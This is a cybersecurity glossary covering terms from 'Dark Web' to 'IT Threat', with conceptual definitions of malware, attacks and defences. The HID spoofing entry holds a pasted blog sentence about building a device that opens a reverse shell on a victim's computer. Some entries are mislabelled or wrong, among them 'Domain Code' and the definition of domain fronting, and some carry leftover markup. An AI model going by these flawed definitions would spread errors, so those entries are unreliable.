Dark Web - The dark web refers to websites and online content that exists outside the reach of traditional search engines and browsers. This content is hidden by encryption methods (in most cases, these sites use the Tor encryption tool to hide their identity and location) and can only be accessed with specific software, configuration settings or pending approval from their admins. The dark web is known for being a hub for illegal activities (drug and crime transactions, dark hat hacking and so on).

Data Asset - A data asset is a piece of information that contains valuable records. It can be a database, a document or any type of information that is managed as a single entity. Like any asset, the information involved contains financial value that is directly connected to the number of people that have access to that data and for this reason it needs to be protected accordingly.

Database - A database is an organized collection of data, generally stored and accessed electronically from a computer system. Where databases are more complex they are often developed using formal design and modeling techniques.

Data Integrity - Data integrity refers to information property that has not been altered or modified by an unauthorized person. The term is used to refer to information quality in a database, data warehouse or other online locations.

Data Leakage - Data leakage describes a data loss of sensitive information, usually from a corporation or large company, that results in unauthorized personnel access to valuable data assets. The sensitive data can be company information, financial details or other forms of data that puts the company name or its financial situation at risk.

Data Loss - Data loss is a process in which information is destroyed by failure or neglect in transmission, processing or sometimes by cybercriminal hands. To prevent data loss, IT teams install back-up and recovery equipment to avoid losing important information.

Data Theft - Data theft describes illegal operations in which private information is retrieved from a company or an individual. Usually, the stolen data includes credentials for online accounts and banking sites, credit card details or valuable corporate information. In the last years these types of operations have increased and it has now become necessary to protect data by additional security means.

Declassify - An administrative process to remove classification markings, security designations, and handling conditions when information is no longer considered to be sensitive.

Dedicated IP - In web hosting, a unique Internet address is assigned exclusively to a single hosting account. A dedicated IP address lets you: View your website via its IP address. Use FTP to access your account while the domain name is otherwise inaccessible, such as during domain name propagation periods.

Dedicated Web Hosting - A dedicated hosting service, dedicated server, or managed hosting service is a type of Internet hosting in which the client leases an entire server not shared with anyone else.

Deep Web - The deep web is a similar concept to the dark web, but has a less shady nature. The world wide web content which is not indexed by traditional search engines is known as the deep web, and preferred by certain groups for its increased privacy levels. However, unlike the dark web, the deep web doesn’t require its users to be particularly tech-savvy, and is not hidden by sophisticated methods; all you need is to know the address of the website you want to access.

Defense In Depth - A phishing defense strategy that uses multiple levels of security to prevent phishing, so that if one layer of defense turns out to be inadequate, additional layers are in place in order to prevent a full breach.

Defence in Depth - An IT security concept (also known as the Castle Approach) in which multiple layers of security are used to protect the integrity of information. These layers can include antivirus and antispyware software, firewalls, hierarchical passwords, intrusion detection, and biometric identification.

Demilitarized Zone - Also refered to as a perimeter network, the (Demilitarized Zone) DMZ is a less-secure portion of a network, which is located between any two policy-enforcing components of the network (e.g. between the Internet and internal networks). An organization uses a DMZ to host its own Internet services without risking unauthorized access to its private network.

Denial of Service Attack - Some Netizens, Orgs, Annon or DoSAsaS attempt to block legitimate users from accessing a service. In a DoS attack, the attacker usually sends excessive messages asking the network or server to authenticate requests that have invalid return addresses. Distributed Denial of Service attacks are where multiple compromised systems are used to target a system.

Departmental Security Control Profile - A set of security controls that establishes an organization's minimum mandatory IT security requirements.

Departmental Security Officer - The individual responsible for a department’s or organization’s security program.

Departmental Security Requirement - Any security requirements prescribed by senior officials of a department that applies generally to its information systems.

Detection - The monitoring and analyzing of system events in order to identify unauthorized attempts to access system resources.

DHCP Server - The Dynamic Host Configuration Protocol (DHCP) is a network management protocol used on Internet Protocol (IP) networks for automatically assigning IP addresses and other communication parameters to devices connected to the network using a client–server architecture.

Dialer - A dialer in the information security world is a spyware device or program that is used to maliciously redirect online communication. Such a software disconnects the legitimate phone connection and reconnects to a premium rate number, which results in an expensive phone bill received by the user. It usually installs itself on the user's system.

Dictionary Attack - A dictionary attack is a form of brute force attack technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary

Digital Signature - A digital signature is a technique used to encrypt and validate the authenticity and integrity of a message, software or digital document. The digital signature is difficult to duplicate by a hacker, that's why it is important in information security.

Digital Skimming - Digital skimming is a term describing the action of stealing credentials and sensitive payment information from website visitors. Digital skimmers use pre-placed malicious javascript code that sniffs user inputs from sensitive forms or creates a malicious iframe with fake payment forms to sniff credit card information.

Directory Traversal - Directory traversal is a type of HTTP exploit that is used by attackers to gain unauthorized access to restricted directories and files. Directory traversal, also known as path traversal, ranks #13 on the CWE/SANS Top 25 Most Dangerous Software Errors.1 Directory traversal attacks use web server software to exploit inadequate security mechanisms and access directories and files stored outside of the web root folder. An attacker that exploits a directory traversal vulnerability is capable of compromising the entire web server.

Disaster Recovery Plan DRP - A recovery plan is a set of procedures that are meant to protect or limit potential loss in a business IT infrastructure in case of an online attack or major hardware or software failure. A recovery plan should be developed during the business impact analysis process.

DMZ - In computer security, a DMZ or demilitarized zone (sometimes referred to as a perimeter network or screened subnet) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to an untrusted network, usually a larger network such as the Internet. The purpose of a DMZ is to add an additional layer of security to an organization's local area network (LAN): an external network node can access only what is exposed in the DMZ, while the rest of the organization's network is firewalled. The DMZ functions as a small, isolated network positioned between the Internet and the private network and, if its design is effective, allows the organization extra time to detect and address breaches before they would further penetrate into the internal networks.

DNS Cache Poisoning - DNS cache poisoning, also known as DNS spoofing, is the act of placing false information in a DNS resolver cache.

DNS Hijacking - DNS hijacking is a process in which an individual redirects queries to a DNS (Domain Name System). It may be accomplished through the use of malicious software or unauthorized modification of a server.

DNS Over HTTPS - Established 2018 DNS over HTTPS (DoH) is a protocol for performing remote Domain Name System (DNS) resolution via the HTTPS protocol. A goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data by man-in-the-middle attacks by using the HTTPS protocol to encrypt the data between the DoH client and the DoH-based DNS resolver. DoH is used for recursive DNS resolution by DNS resolvers. Resolvers (DoH clients) must have access to a DoH server hosting a query endpoint. DoH lacks native support in operating systems. Thus, a user wishing to use it must install additional software.

DNS Over TLS - DNS over TLS (DoT) is a security protocol for encrypting and wrapping Domain Name System (DNS) queries and answers via the Transport Layer Security (TLS) protocol. The goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data via man-in-the-middle attacks. As of 2019, Cloudflare, Quad9, Google, Quadrant Information Security, CleanBrowsing and LibreOps are providing public DNS resolver services via DNS over TLS.

DNS Request - A DNS query (also known as a DNS request) is a demand for information sent from a user's computer (DNS client) to a DNS server. In most cases a DNS request is sent, to ask for the IP address associated with a domain name.

DNS Tunneling - DNS tunneling uses DNS requests to implement a command and control channel for malware. Inbound DNS traffic can carry commands to the malware, while outbound traffic can exfiltrate sensitive data or provide responses to the malware operator’s requests. This works because DNS is a very flexible protocol. There are very few restrictions on the data that a DNS request contains because it is designed to look for domain names of websites. Since almost anything can be a domain name, these fields can be used to carry sensitive information. These requests are designed to go to attacker-controlled DNS servers, ensuring that they can receive the requests and respond in the corresponding DNS replies.

Document Malware - Document-Based Malware – Cybercriminals use email to deliver a document containing malicious software, also known as malware. Typically, either the malware is hidden directly in the document itself or an embedded script downloads it from an external website.

Domain Fronting - This phishing scam begins with an email asking recipients to click on a link designed to look like a legitimate site, which then re-routes them to another unsafe site in which hackers steal sensitive information. Originally developed as a way for political and human rights activists living under repressive regimes to circumvent heavy censorship, cybercriminals have hijacked the technique for nefarious purposes.

Domain Generation Algorithm DGA - Domain generation algorithms (DGA) are algorithms seen in various families of malware that are used to periodically generate a large number of domain names that can be used as rendezvous points with their command and control servers.

Domain Shadowing - Domain Shadowing is a malicious tactic used by cyber criminals to build their infrastructure and launch attacks while remaining undetected. First, attackers steal and gather credentials for domain accounts. Using these stolen credentials, they log into the domain account and create subdomains which redirect traffic towards malicious servers, without the domain owner having any knowledge of this. Domain shadowing allows cyber attackers to bypass reputation-based filters and pass their malicious traffic as safe.

Domain Code - Modern, advanced malware often has modular structure, including multiple components. One of them is dormant code, which means that the malware needs specific triggers to execute the task is was created for. This type of behavior is coded into the malware to it can bypass signature-based detection in products such as traditional antivirus and anti-malware solutions. There is also another reason for using dormant code: since advanced malware, such as ransomware or financial malware, usually rely on extern infrastructure to download components for infection, the malware can remain dormant and undetected if it can’t reach its Control and Command servers to execute further.

Doxxing - Gathering an individual's Personally Identifiable Information (PII) and disclosing or posting it publicly, usually for malicious purposes such as public humiliation, stalking, identity theft, or targeting an individual for harassment.

Dridex - Dridex is a strain of financial malware that uses Microsoft Office macros to infect information systems. Dridex is engineered to collect and steal banking credentials and additional personal information and its fundamental objective is banking fraud.

Drive-By Attack - A drive-by attack is the unintentional download of a virus or malicious software (malware) onto your system. A drive-by attack will usually take advantage of (or “exploit”) a browser, app, or operating system that is out of date and has a security flaw.

Due Diligence - Due diligence is an investigation or audit of a potential investment or product to confirm all facts, that might include the review of financial records. Due diligence refers to the research done before entering into an agreement or a financial transaction with another party.

Dumpster Diving - One man's trash is another man's playground.

Dyreza, Dyre - Dyreza (also called Dyre) is a banking Trojan (financial malware) that appeared in 2014, whose behavior is similar to the ZeuS family, although there is no connection between Dyreza and ZeuS. The malware hides in popular web browsers that millions of users employ to access the web and aims to retrieve sensitive financial information every time the victim connects to a banking website. Dyreza is capable of key-logging, circumventing SSL mechanisms and two-factor authentication, and is usually spread through phishing emails.

top page


Eavesdropping Attack - Network Eavesdropping or network sniffing is an attack that aims to capture information transmitted over a network by other computers. The objective is to acquire sensitive information like passwords, session tokens, or any kind of confidential information.

Edge Interface - A network-layer service interface point that attaches an end system, internal boundary system, or zone interface point to a zone internetwork.

Email Hosting - Email hosting is a service in which your email messages and associated files are all stored on a server. When you receive an email to your website's domain address, the email is routed across the internet and stored on the recipient server.

Email Malware Distribution - Although outdated, some malware families still use email attachments as a mean of spreading malware and infecting users’ computers. This type of infection relies on the user double clicking on the attachment. A current method that uses email as a dispersion mechanism is inserting links to malicious websites.

Emission Security - The measures taken to reduce the risk of unauthorized interception of unintentional emissions from information technology equipment that processes classified data.

Emotet - Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.

Encapsulation - Encapsulation refers to a programming approach that revolves around data and functions contained, or encapsulated, within a set of operating instructions. Applications become vulnerable to an attack when they fail to separate or differentiate critical data or functionality within components. When an encapsulation vulnerability exists, bad code creeps across software components or "leaks" from an application. This problem can also lead to cross-domain attacks. Without strong and clearly defined boundaries between control spheres, attackers can gain unauthorized access to data and functions.

Encrypted Network - Network encryption is the process of encrypting or encoding data and messages transmitted or communicated over a computer network. It is a broad process that includes various tools, techniques and standards to ensure that the messages are unreadable when in transit between two or more network nodes.

Encryption - In cryptography, encryption is the process of encoding a message or information in such a way that only authorized parties can access it and those who are not authorized cannot. Encryption does not itself prevent interference, but denies the intelligible content to a would-be interceptor.

End to End Encryption - This process involves using communications encryption to make information unavailable to third parties. When being passed through a networking, the information will only be available to the sender and the receiver, preventing ISPs or application service providers to discover or tamper with the content of the communication.

End to End Security - End-to-end security is a term used in telecommunications to refer to safeguarding information by using encryption to ensure its security from the point of origin to the point of destination.

Endpoint Identifiers - Abbreviated as EID, an endpoint identifier is used to specify and uniquely identify endpoints connected to the network. Information about the topological location of an endpoint in an internetwork is given by a locator.

Endpoint Detection and Response - Endpoint Detection and Response, or EDR, is a form of technology that provides continuous monitoring and response to advanced cybersecurity threats. EDR is a subset of endpoint security, which handles holistically protecting corporate networks and data when employees access the network remotely via laptops, smartphones, and other mobile devices.

Endpoint Security - In network security, endpoint security refers to a methodology of protecting the corporate network when accessed via remote devices such as laptops or other wireless and mobile devices. Each device with a remote connecting to the network creates a potential entry point for security threats. Endpoint security is designed to secure each endpoint on the network created by these devices.

End System - A network connected computer that, for a communication, is the end source or destination of a communication.

End User Systems - End systems for human use, such as a desktop with a personal computer (display, keyboard, mouse, and operating system).

Entropy - In information theory, entropy is the measure of uncertainty associated with a random variable. In terms of Cryptography, entropy must be supplied by the cipher for injection into the plaintext of a message so as to neutralise the amount of structure that is present in the unsecure plaintext message.

Enterprise Risk Management - The methods and processes that organizations use to identify and manage cyber security risks that could endanger its corporate mission. As part of this plan, the organization will also establish a plan to protect its assets and a plan to react in case a cyber security risk becomes reality.

Error Handling Flaws - The most common vulnerabilities occur when a system reveals detailed error messages or codes generated from stack traces, database dumps, and a wide variety of other problems, including out of memory, null pointer exceptions, and network timeout errors.

Escrow Key - Key escrow (also known as a “fair” cryptosystem) is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.

Ethernet - An Ethernet adapter connects a computer to the Internet or Local Network by wired connection. Most computers include an Ethernet port on the Motherboard . Newer computers may only support WiFi connections.

Equipment emanation - An electric field radiation that comes from the equipment as a result of processing or generating information.

Evaluator - An evaluation team composed of the National Research Council – Industrial Research Assistance Program (NRC-IRAP), PWGSC and/or subject matter experts from other government departments will evaluate proposals. If required, Canada may use an external Subject Matter Expert to evaluate any proposal.

Evil Maid Attack - is an attack on an unattended device, in which an attacker with physical access alters it in some undetectable way so that they can later access the device, or the data on it.

Exploit - An exploit (from the English verb to exploit, meaning "to use something to one’s own advantage") is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized). Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service (DoS or related DDoS) attack.

Exploit Kits - Exploit kits (EKs) are computer programs designed to find flaws, weaknesses or mistakes in software apps (commonly known as vulnerabilities) and use them to gain access into a system or a network. They are used in the first stages of a cyber attack, because they have the ability to download malicious files and feed the attacked system with malicious code after infiltrating it.

Exploit Kits-as-a-Service - Exploit kits as-a-service are a relatively recent business model employed by cyber criminals in which they create, manage and sell or rent exploit kits which are accessible and easy to use in cyber attacks. Exploit kits-as-a-service don’t require much technical expertise to be used, they are cheaper (especially if rented), they’re flexible and can be packed with different types of malware, offer broader reach, are usually difficult to detect and can be used to exploit a wide range of vulnerabilities. This business model makes it very profitable for exploit kit makers to sell their malicious code and increase their revenues.

External Security Testing - Security testing conducted from outside the organization’s security perimeter.

Exfiltration - The unauthorized removal of data or files from a system by an intruder.

top page


Firewall - A security barrier placed between two networks that controls the amount and kinds of traffic that may pass between the two. This protects local system resources from being accessed from the outside.

Fail Safe - A Fail-Safe security system or device is an automatic protection system that intervenes when a hardware or software failure is detected.

Fake Antivirus Malware - Rogue antivirus or rogue security is a form of computer malware that simulates a system infection that needs to be removed. The users are asked for money in return for removal of malware, but it is nothing but a form of ransomware.

False Positive - A false positive is identified when a security solution detects a potential cyber threat which is, in fact, a harmless piece of software or a benign software behavior. For example, your antivirus could inform you that there's a malware threat on your PC, but it could happen that the program it's blocking is safe.

Femtocell - Smallest type of small cell used to expand cellular network connectivity within a targeted geographic area (typically a small, single location).

Field-Programmable Gate Arrays FPGA - A field-programmable gate array (FPGA) is an integrated circuit that can be programmed or reprogrammed to the required functionality or application after manufacturing. Important characteristics of field-programmable gate arrays include lower complexity, higher speed, volume designs and programmable functions.

File Binder - File binders are applications used by online criminals to connect multiple files together in one executable that can be used in launching malware attacks.

Fileless Malware - Fileless malware are types of malicious code used in cyber attacks that don’t use files to launch the attack and carry on the infection on the affected device or network. The infection is run in the RAM memory of the device, so traditional antivirus and antimalware solutions can’t detect it at all. Malicious hackers use fileless malware to achieve stealth, privilege escalation, to gather sensitive information and achieve persistence in the system, so the malware infection can continue to carry on its effect for a longer period of time.

Fileless Threats - The term "fileless" suggests that a threat does not come in a file, such as a backdoor that lives only in the memory of a machine. However, there's no generally accepted definition for fileless malware. The term is used broadly; it's also used to describe malware families that do rely on files to operate.

Financial Malware - Financial malware is a category of specialized malicious software designed to harvest financial information and use it to extract money from victims’ accounts. Because it is a rather new type of malware, it is also very sophisticated and it can easily bypass traditional security measures, such as antivirus. Financial malware is capable of persisting in the affected system for a long time, until it gathers the information associated with financial transactions and it can start to leak money from the targeted account. Banking fraud cyber crimes are one of the most serious cyber threats in the current risk landscape.

Firmware - Type of software that is etched directly into a piece of hardware. It operates without going through APIs, the operating system, or device drivers—providing the needed instructions and guidance for the device to communicate with other devices or perform a set of basic tasks and functions as intended.

Flip Button - In the malware world, a flip button appears when spyware or adware solutions trick users into following various actions and installing malicious software on the system.

Flooding - Flooding is a security attack used by hackers against a number of servers or web locations. Flooding is the process of sending a large amount of information to such a location in order to block its processing power and stop its proper operation.

Forensic Specialist - A Computer Forensics Investigator or Forensic Analyst is a specially trained professional who works with law enforcement agencies, as well as private firms, to retrieve information from computers and other types of data storage devices.

Form Grabbing Malware - This type of malware can harvest your confidential data when you're filling a web form, before the data is sent over the Internet, to a secure server. By doing this, the malware can avoid the security ensured by an HTTPS connection. Unfortunately, using a virtual keyboard, autofill or copy/paste won't protect your from this threat. What's more, the malware can categorize data according to type (username, password, etc.) and even grab de URL where you were inputting your information.

Frameloss - Frame Loss is defined as the percentage of frames that were successfully transmitted from the source but were never received at the destination. Since frame loss is usually caused by a lack of resources, this measurement acts as an indicator of how a device will perform under a heavy load.

FTP - File Transfer Protocol is a standard network protocol used for the transfer of computer files between a client and server on a computer network. It is generally considered to be an insecure protocol because it relies on clear-text usernames and passwords for authentication and does not use encryption. Data sent via FTP is vulnerable to sniffing, spoofing, and brute force attacks, among other basic attack methods.

top page


Gateway - An intermediate system that is the interface between two computer networks. A gateway can be a server, firewall, router, or other device that enables data to flow through a network.

Geolocation - or Geopositioning refers to the process of determining or estimating the geographic position of an object. This yields a set of geographic coordinates (such as latitude and longitude) in a given map datum; positions may also be expressed as a bearing and range from a known landmark. In turn, positions can determine a meaningful location, such as a street address.

Global Information Grid GIG - The global information grid is the globally interconnected, end-to-end set of information capabilities for collecting, processing, storing, disseminating, and managing information on demand to warfighters, policy makers, and support personnel. The GIG includes owned and leased communications and computing systems and services, software (including applications), data, security services, other associated services, and National Security Systems. Non-GIG IT includes stand-alone, self-contained, or embedded IT that is not, and will not be, connected to the enterprise network.

Global Information Infrastructure GII - The Global Information Infrastructure is the worldwide interconnections of the information systems of all countries, international and multinational organizations, and international commercial communications.

Glossary - A glossary, also known as a vocabulary or clavis, is an alphabetical list of terms in a particular domain of knowledge with the definitions for those terms. Traditionally, a glossary appears at the end of a book and includes terms within that book that are either newly introduced, uncommon, or specialized.

GNU - The name GNU stands for “GNU’s Not Unix” (GNU is pronounced as g’noo). The development of GNU started in January 1984 and is known as the GNU Project. GNU is a Unix-like Operating System (OS), that comprises of many programs such as applications, libraries, developer tools, games. The GNU is available with source code that allows a user to run, copy, modify, distribute, study, change, and improve the software.

Gnutella - Gnutella is an open file sharing or peer-to-peer (P2P) network that was originally developed by Justin Frankel and Tom Pepper of Nullsoft in the early 2000. It was the first decentralised file sharing network that acts as a server for sharing files while simultaneously acting as a client that searches for and downloads files from other users.

Gh0st - Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device

Governance, Risk Management and Compliance - Governance, Risk Management and Compliance is a comprehensive and integrated organization wide system for achieving the goals set in each areas namely governance, Risk management, and Compliance, and meet the regulatory standards and requirements.

Graduated Security - Graduated security is a security system that provides several levels of protection based on threats, risks, available technology, support services, time, human concerns, and economics.

Grants - A transfer payment subject to pre-established eligibility and entitlement criteria. A grant is not subject to being accounted for by a recipient nor normally subject to audit by the department. The recipient may be required to report on results achieved.

Green Hosting - ECO-Friendly hosting is Internet hosting which involves green technologies to reduce environmental impact. Green hosting includes Carbon offsetting, powering a data center directly with renewable energy, planting trees, plants and grass around and over Data Centers and more day-to-day activities such as energy conservation and the use of energy saving appliances.

Grey Hat Hacker - Greyhat hackers have a more ambiguous mode of operation compared to blackhat and whitehat hackers. For instance, they may use illegal means to detect a vulnerability, but then disclose it to the targeted organization. Another perspective on greyhat hackers focuses on those that find exploits, and then sell the know-how to governments but only after receiving a payment. Greyhat hackers distinguish themselves from blackhat hackers on a single important criteria: they don’t use or sell the exploit for criminal gain.

Group Authenticator - A group authenticator is used sometimes in addition to a sign-on authenticator, to allow access to specific data or functions that may be shared by all members of a particular group.

Guard - A gateway that is placed between two networks, computers, or other information systems that operate at different security levels. The guard mediates all information transfers between the two levels so that no sensitive information from the higher security level is disclosed to the lower level.It also protects the integrity of data on the higher level.

Guard System - A guard system is a mechanism limiting the exchange of information between information systems or subsystems.

Guessing Entropy - A guessing entropy is a measure of the difficulty that an Attacker has to guess the average password used in a system. In this document, entropy is stated in bits. When a password has n-bits of guessing entropy then an attacker has as much difficulty guessing the average password as in guessing an n-bit random quantity. The attacker is assumed to know the actual password frequency distribution.

Guideline - A Guideline is a general rule or a piece of advice required to follow in order to accomplish the set goals of an organization.

top page


HaaS - Hardware as a Service (HaaS) is a service provision model for hardware that is defined differently in managed services and grid computing contexts.

Hackathon - A social coding event that brings computer programmers and other interested people together to improve upon or build a new software program.

Hacker - Hacking refers to activities that seek to compromise digital devices, such as computers, smartphones, tablets, and even entire networks. And while hacking might not always be for malicious purposes, nowadays most references to hacking, and hackers, characterize it/them as unlawful activity by cybercriminals—motivated by financial gain, protest, information gathering (spying), and even just for the “fun” of the challenge.

Hackerazzi - Cybercriminals who hack into the email accounts of celebrities to access and exploit their private information.

Hacktivism - Hacktivism is the activity of using hacking techniques to protest against or fight for political and social objectives. One of the most well known hacktivist groups in the world is Anonymous.

Handwriting Recognition and Mouse Gestures - Also, many PDAs and lately tablet PCs can already convert pen (also called stylus) movements on their touchscreens to computer understandable text successfully. Mouse gestures use this principle by using mouse movements instead of a stylus. Mouse gesture programs convert these strokes to user-definable actions, such as typing text. Similarly, graphics tablets and light pens can be used to input these gestures, however these are less common everyday. The same potential weakness of speech recognition applies to this technique as well.

Hardening - In computing, hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one.

HeartBleed - Heartbleed is a security bug that appeared in 2014, which exposed information that was usually protected by SSL/TLS encryption. Because of a serious vulnerability that affected the OpenSSL library, attackers could steal data that was kept confidential by a type of encryption used to secure the Internet. This bug caused around 500.000 web servers (17% of all severs on the Internet) to be exposed to potential data theft.

Hoax - A hoax is a false computer virus warning. You may receive such hoaxes via email, instant messaging or social media. Before acting on it, be sure to go online and check the validity of the claim. Also, when you have proof that it's fake, it's a good idea to inform the sender as well. Remember that such hoaxes can lead to malicious websites which can infect your devices with malware.

Honeymonkey - This is an automated system designed to simulate the actions of a user who’s browsing websites on the Internet. The purpose of the system is to identify malicious websites that try to exploit vulnerabilities that the browser might have. Another name for this is Honey Client.

Honeynet - A decoy network that contains one or more honeypots. It looks like a real network and contains multiple systems but is hosted on one or only a few servers, each representing one environment. For example, a Windows honeypot machine, a Mac honeypot machine and a Linux honeypot machine.

Honeypot - This a program used for security purposes which is able to simulate one or more network services that look like a computer’s ports. When an attacker tries to infiltrate, the honeypot will make the target system appear vulnerable. In the background, it will log access attempts to the ports, which can even include data like the attacker’s keystrokes. The data collected by a honeypot can then be used to anticipate incoming attacks and improve security in companies.

Host Based Intrusion Detection System - A host-based intrusion detection system (HIDS) is an intrusion detection system that is capable of monitoring and analyzing the internals of a computing system as well as the network packets on its network interfaces, similar to the way a network-based intrusion detection system (NIDS) operates.

Hosts File - The computer file hosts is an operating system file that maps hostnames to IP addresses. In modern operating systems, the hosts file remains an alternative name resolution mechanism, configurable often as part of facilities such as the Name Service Switch as either the primary method or as a fallback method.

HTTP Status Code - This is a list of Hypertext Transfer Protocol response status codes. Status codes are issued by a server in response to a client's request made to the server.

HTTPS - Hypertext Transfer Protocol Secure is an extension of the Hypertext Transfer Protocol. It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is encrypted using Transport Layer Security or, formerly, Secure Sockets Layer.

HTTPS Scanning - This is another name of a Man-in-the-Middle attack. Scanning HTTPS (Hypertext Transfer Protocol Secure) content allows the attackers to decrypt, analyze, and re-encrypt content between websites that use SSL (Secure Sockets Layer) for security and a user’s browser. This type of attack is usually used to snoop in on information exchanges and steal confidential data.

Human Firewall - The act of relying on employees to protect the company from phishing by providing phishing awareness training. Unfortunately, this technique is insufficient as a stand-alone defense against phishing attacks.

Human Interface Device HID Spoofing - HID spoofing keys use specialized hardware to fool a computer into believing that the USB key is a keyboard. This fake keyboard injects keystrokes as soon as the device is plugged into the computer. The keystrokes are a set of commands that compromise the victims computer. As we will see later in the post (spoiler alert!), with a bit of work and ingenuity, we will create a HID device that spawns a reverse TCP shell that will give us full remote control over the victims computer.

Hybrid Attack - A hybrid attack makes a dictionary attack (used to crack passwords) even stronger by adding numerals and symbols, so credentials can be hacked even faster.

Hypervisor Level Rootkits - Hypervisor (Virtualized) Level Rootkits are created by exploiting hardware features such as Intel VT or AMD-V (Hardware assisted virtualization technologies). Hypervisor level rootkits hosts the target operating system as a virtual machine and therefore they can intercept all hardware calls made by the target operating system.

top page

IcedID - IcedID is a modular banking Trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victim’s online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers

ICMP - A supporting protocol in the Internet protocol suite. It is used by network devices, including routers, to send error messages and operational information indicating success or failure when communicating with another IP address, for example, an error is indicated when a requested service is not available or that a host or router could not be reached.

Ideal Circumstances - Perfect or without equal. Under ideal circumstances, one would compare the reconstruction side by side with the original system.

Identity Theft - Identity theft refers to the process of stealing someone’s personal identification data and using it online in order to pose as that person. Hackers can make use of a person’s name, photos, papers, social security number and so on, to gain financial advantage at this person’s expense (by obtaining credit or by blackmailing), or as a means of damaging the person’s reputation etc.

Inadvertent Disclosure - This type of security incident involves accidentally exposing information to an individual who doesn’t have access to that particular data.

Incremental Backups - Incremental backups are extremely important for keeping information safe and up to date. This type of backup will only back up the files that you’ve modified since performing the last backup. This means the backup is faster and you can ensure that you’ll always have all your worked backed up safely.

Information Assurance IA - This is a set of measures designed to protect and defend data and information systems by ensuring that they are always available, that their integrity is safe, that they’re confidential and authentic (non-repudiation principle). These measures include having a data backup to restore information in case of an unfortunate event, having cyber security safeguards in place and ensuring that detection and reaction capabilities are featured.

Information flow (information theory) - Information flow in an information theoretical context is the transfer of information from a variable x {\displaystyle x} x to a variable y {\displaystyle y} y in a given process. Not all flows may be desirable; for example, a system should not leak any secret (partially or not) to public observers.

Information Flow Control - This is an important safeguard in companies, created to ensure that data transfers in an information system comply with the security policy and are as safe as possible.

Information Security - Information security, often referred to as InfoSec, refers to the processes and tools designed and deployed to protect sensitive business information from modification, disruption, destruction, and inspection.

Information Security Policy - Information security policy is a set of policies issued by an organization to ensure that all information technology users within the domain of the organization or its networks comply with rules and guidelines related to the security of the information stored digitally at any point in the network or within the organization's boundaries of authority.

Information Security Risk - Information security risk comprises the impacts to an organization and its stakeholders that could occur due to the threats and vulnerabilities associated with the operation and use of information systems and the environments in which those systems operate.

Information System Resilience - The ability of an information system to continue to: (i) operate under adverse conditions or stress, even if in a degraded or debilitated state, while maintaining essential operational capabilities; and (ii) recover to an effective operational posture in a time frame consistent with mission needs.

Information Systems Security (INFOSEC) - The protection of information systems against unauthorized access to or modification of information, whether in storage, processing or transit, and against the denial of service to authorized users, including those measures necessary to detect, document, and counter such threats. See information assurance (IA).

Injury - The damage to the national interests and non-national interests that business activities serve resulting from the compromise of IT assets.

Insider Threat - An insider threat is a malicious threat to an organization that comes from people within the organization, such as employees, former employees, contractors or business associates, who have inside information concerning the organization's security practices, data and computer systems.

Integrated Services Digital Network ISDN - Integrated Services Digital Network is a set of communication standards for simultaneous digital transmission of voice, video, data, and other network services over the traditional circuits of the public switched telephone network. It was first defined in 1988 in the CCITT red book.

Integrity - This is one of the core principles in cyber security and it refers to the fact that we must ensure that information has not been changes (deliberately or unwillingly), and that the data is accurate and complete.

Interface - A boundary across which two systems communicate. An interface might be a hardware connector used to link to other devices, or it might be a convention used to allow communication between two software systems.

Internet of Things - Computing concept that describes the idea of everyday physical objects being connected to the internet and being able to identify themselves to other devices and send and receive data. The term is closely identified with radio frequency identification (RFID) as the method of communication, although it also may include other sensor technologies, wireless technologies or QR codes. IoT devices can gather data from urban and public areas to affect the environment, public safety and resource management. Factories and cities will become smart, interconnected pieces of the larger IoT system through the widespread implementation of regional sensors.

Internet Protocol - The Internet Protocol (IP) is the principal communications protocol in the Internet protocol suite for relaying datagrams across network boundaries. Its routing function enables internetworking, and essentially establishes the Internet. An IP address is a logical address assigned at Layer 3 and can be assigned to an IP-based system. The same IP address can be assigned to different systems, albeit atdifferent times, unlike MAC addresses.

Internet Protocol Conflict - An IP address conflict occurs when two devices on the same local physical or wireless network claim to have the same IP address. A second assignment of an address generally stops the IP functionality of one or both of the devices.

Internetwork Packet Exchange IPX - A networking protocol used by the Novell NetWare operating systems. Like UDP/IP, IPX is a datagram protocol used for connectionless communications. Higher-level protocols, such as SPX and NCP, are used for additional error recovery services.

Intellectual Property - This refers to useful artistic, technical or industrial information, concepts, ideas or knowledge that clearly show that they’re owned by someone who has control over them, either in physical form or in representation.

Internal Security Testing - This type of testing is conducted from inside an organization, to examine the resilience and strength of a company’s security perimeter and defenses.

Intrusion - In cyber security, intrusion refers to the act of getting around a system’s security mechanisms to gain unauthorized access.

Intrusion Detection Systems IDS - An intrustion detection system (IDS) is a software application or hardware appliance that monitors traffic moving on networks and through systems to search for suspicious activity and known threats, sending up alerts when it finds such items.

IP Security (IPSec) - In computing, Internet Protocol Security is a secure network protocol suite that authenticates and encrypts the packets of data to provide secure encrypted communication between two computers over an Internet Protocol network. It is used in virtual private networks.

IP Spoofing - This is a tactic used by cyber criminals to supply a false IP address that masquerades a legitimate IP. This helps the attacker gain an unfair advantage and trick the user or a cyber security solution that’s in place.

IT Asset - The components of an information system, including business applications, data, hardware, and software.

IT Threat - Any potential event or act (deliberate or accidental) or natural hazard that could compromise IT assets.

